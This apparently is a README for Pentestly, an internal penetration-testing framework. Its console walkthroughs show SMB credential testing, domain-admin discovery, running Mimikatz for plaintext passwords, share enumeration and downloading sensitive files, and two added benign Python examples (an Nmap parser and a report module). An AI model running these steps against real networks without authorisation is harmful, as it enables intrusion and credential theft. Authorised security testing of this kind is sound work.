Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool
Pentestly is a tool for internal penetration tests that combines and extends existing Python tools.
The main aim of Pentestly is to offer a familiar user interface, and because it is written in Python, contributing to the framework should be easy. Pentestly brings the power of Python, Powershell and other tools together in one familiar user experience.
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI
smbmap.py - Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
powercat.ps1 - Netcat-esque functionality in Powershell
Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell
CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly
Features of Pentestly:
- Import NMAP XML
- Test SMB authentication using:
    - individual credentials
    - a file containing credentials
    - null credentials
    - an NTLM hash
- Test local administrator privileges for successful SMB authentication
- Identify readable SMB shares for valid credentials
- Store Domain/Enterprise Admin account names
- Determine location of running Domain Admin processes
- Determine systems of logged in Domain Admins
- Execute Powershell commands in memory and exfil results
- Execute Mimikatz to gather plaintext passwords from memory (Invoke-Mimikatz.ps1)
- Receive a command shell (Powercat)
- Receive a meterpreter session (Invoke-Shellcode.ps1)
How you can install it:
To install, run the following commands:
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly
How you can use it:
Step 1 - Set up a workspace
[pentestly][default] > workspaces list
+------------+
| Workspaces |
+------------+
| default    |
+------------+
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project
Step 2 - Load from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name      Current Value                     Required  Description
--------  --------------------------------  --------  ------------------------------------
FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input
[pentestly][project][nmap_xml] > run
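The nmap_xml module above has to turn the Nmap XML report into rows for the workspace database. The following is an added example of that parsing, not Pentestly's own code: it reads a constructed Nmap XML report and returns one record per open port on each host that is up, skipping hosts that are down and ports that are closed or filtered.

```python
# Added example, not Pentestly's own code: the parsing the nmap_xml module has
# to do, turning an Nmap XML report into one row per open port on each live host.
import xml.etree.ElementTree as ET

# Constructed Nmap XML: one host up with one open and one filtered port, one host down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX full-all-alive.xml 192.168.8.0/28">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.8.10" addrtype="ipv4"/>
    <hostnames><hostname name="fs01.corp.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Windows Server 2012 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/><address addr="192.168.8.11" addrtype="ipv4"/></host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return [{host, hostname, port, proto, service}] for every open port on every host that is up."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts that did not answer produce no rows
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # no IPv4 address to key the row on
        name_el = host.find("hostnames/hostname")
        hostname = name_el.get("name") if name_el is not None else ""
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not services to test
            svc = port.find("service")
            records.append({"host": addr.get("addr"), "hostname": hostname,
                            "port": int(port.get("portid")), "proto": port.get("protocol"),
                            "service": svc.get("name") if svc is not None else ""})
    return records
```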
Step 3 - Test logins
To test logins, use a file containing credentials:
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Alternatively, a single username and password can be used:
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'
Step 4 - Gather Domain and Enterprise admins
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name    Current Value  Required  Description
------  -------------  --------  ---------------------------------------------
SOURCE  default        yes       source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2
Step 6 - Run Mimikatz over the IPs where the credentials have execute rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select the local interface on which the scripts will be hosted:
0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!
Step 7 - Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
| host           | access | username   | password   | domain | process | logged_in | success | execute | module |
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
Step 8 - Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
| host           | access       | username  | password        | domain | process | logged_in | success | execute | module |
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
Step 9 - Enumerate shares (enumshares):
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})
Step 10 - Show new shares:
[pentestly][default][interesting_files] > show pentestly_shares
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
| rowid | host            | username      | readwrite | readonly          | noaccess | module     |
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
Step 11 - Find/download interesting files
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- --------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
The pattern can be changed to something more specialized:
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name     Current Value               Required  Description
-------  --------------------------  --------  ---------------------------------------------
PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
SOURCE   default                     yes       source of input (see 'show info' for details)
Run the module, and the files that match are downloaded:
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt
Contributing:
Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:
from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):
    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            # (option name, default value, required (True/False), description)
            ('Option1', 'Default Value', False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module
        pass

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options
        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")
        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)
        # self.success - print the successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module
        pass
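To show the skeleton filled in end to end, here is an added example module (not Pentestly's own code) that reports the hosts on which a stored Domain Admin credential has authenticated, the same question the show_domain_admins step answers. libs.pentestlymodule is not importable outside the framework, so the block carries a stand-in PentestlyModule that provides the query, output and success helpers the skeleton uses over an in-memory SQLite pentestly_creds table; the column names follow the tables shown above, the rows are constructed, and the "REDACTED" passwords are placeholders.

```python
# Added example, not Pentestly's own code: a complete module in the skeleton's shape.
# libs.pentestlymodule is not importable here, so PentestlyModule is a stand-in that
# offers the helpers the skeleton uses (query/output/success) over an in-memory SQLite
# pentestly_creds table (columns from the tables shown on the page; rows constructed).
import sqlite3

class PentestlyModule:
    def __init__(self, conn):
        self.conn = conn
        self.messages = []  # stands in for what the framework prints to the user
    def query(self, sql, params=()):
        return self.conn.execute(sql, params).fetchall()
    def output(self, text):
        self.messages.append("[*] %s" % text)
    def success(self, text):
        self.messages.append("[+] %s" % text)
    def run(self):  # same life cycle as the skeleton: pre, run(rows of meta query), post
        self.module_pre()
        self.module_run(self.query(self.meta["query"]))
        self.module_post()
        return self

class Module(PentestlyModule):
    meta = {
        'name': 'Domain Admin exposure report',
        'author': 'example',
        'query': "select host, username, domain, execute from pentestly_creds "
                 "where access = 'Domain Admin' and success = 1",
        'options': (),
    }
    def module_pre(self):
        self.output("Checking stored credentials for Domain Admin exposure")
    def module_run(self, data):
        # data: rows returned by meta['query']; group them so each host is reported once
        self.exposed = {}
        for host, user, domain, execute in data:
            self.exposed.setdefault(host, []).append((domain + "\\" + user, bool(execute)))
        for host, accounts in sorted(self.exposed.items()):
            self.success("%s: Domain Admin valid for %s" % (host, ", ".join(n for n, _ in accounts)))
    def module_post(self):
        self.output("%d host(s) with Domain Admin exposure" % len(self.exposed))

def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table pentestly_creds (host, access, username, password, "
                 "domain, process, logged_in, success, execute, module)")
    conn.executemany("insert into pentestly_creds values (?,?,?,?,?,?,?,?,?,?)", [
        ("10.0.0.5", "Domain Admin", "da1", "REDACTED", "corp", None, None, 1, 1, "login"),
        ("10.0.0.5", "", "svc", "REDACTED", "corp", None, None, 1, 0, "login"),
    ])
    return Module(conn).run()
```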
TODO
- Implement secretsdump.py module
- Add utility functions for database queries similar to creds, services
- Rework draw_table function to have fixed width columns
- Import credentials from Gladius
- Implement GPP password search and decrypt module
- Look into utilizing Invoke-Shellcode